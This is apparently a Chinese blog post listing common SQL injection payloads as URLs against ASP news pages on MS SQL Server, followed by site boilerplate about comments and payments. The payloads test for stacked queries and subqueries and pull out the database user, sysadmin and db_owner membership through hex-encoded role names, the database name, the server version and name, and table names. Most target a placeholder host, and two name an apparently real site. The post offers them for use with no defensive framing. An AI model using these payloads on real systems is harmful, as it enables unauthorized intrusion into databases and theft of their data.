SQL 注入有常用语句

是否支持多句查询
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--

是否支持子查询
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回用户名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0

当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回数据库名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0

操作系统和SQLserver版本
http://www.99568.com/99568news/shownews.asp?id=51 And @@version = 1

本地服务器名称
http://www.99568.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077  And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值